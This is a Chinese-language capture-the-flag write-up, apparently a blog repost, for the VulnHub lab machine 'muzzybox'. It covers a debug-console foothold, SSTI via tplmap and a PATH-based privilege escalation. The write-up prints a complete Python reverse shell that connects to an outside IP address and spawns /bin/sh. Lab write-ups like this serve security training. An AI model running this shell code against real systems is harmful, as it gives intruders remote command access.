vulnhub~muzzybox

Posted wlpk

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了vulnhub~muzzybox相关的知识,希望对你有一定的参考价值。

  1. 这个靶机是最新出的,Google了一番,发现walk trough少的可怜,最初是自己弄弄,但自己的确是菜。
    1. challenge 1.就是修改idcard.png 的内容,position principal; Access Level authorized;
    2. 技术图片
    3. 图书卡的Name可以随便写,没有限制(最初我以为是图片木马),会得到PIN:123-456-789,这个东西在challenge 2中会有用处。
    4. challenge 2是python的错误页面,包含着console窗口(要仔细查看哟),然后就是正向连接了呗。
      1 import socket,subprocess,os
      2 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
      3 s.connect(("59.188.234.64",14575))
      4 os.dup2(s.fileno(),0)
      5 os.dup2(s.fileno(),1)
      6 os.dup2(s.fileno(),2)
      7 p=subprocess.call(["/bin/sh","-i"]);

      在主机监听(nc 或者msf),成功的拿到了shell.

    5. challenge 3试了一下存在ssti漏洞,关于这个漏洞网上有很多的说明及instance。手动注入有点麻烦,干脆使用tplmap,技术图片

      在ssti目录下拿到了ssh 口令和用户名 

      1. 技术图片
      2. 登录以后干傻事呀,常规操作发现没有sudo -l;痛苦,就查看了环境变量,发现了 /usr/local/sbin尽然有当前用户的read权限,没毛病,可以利用了。技术图片
      3. 在主机监听,得到flag
    6. 总结如下:个人感觉对ctf的套路还不够熟悉,同时对uinx-like不太了解,应该较为深入的了解一下,平时多看技术博客。

以上是关于vulnhub~muzzybox的主要内容,如果未能解决你的问题,请参考以下文章

Vulnhub_DC3 记录

VulnHub靶场Hackable: III

Vulnhub_bossplayersCTF 记录

Vulnhub入门实战-Wakanda

Vulnhub入门实战-Wakanda

Vulnhub_DC8 记录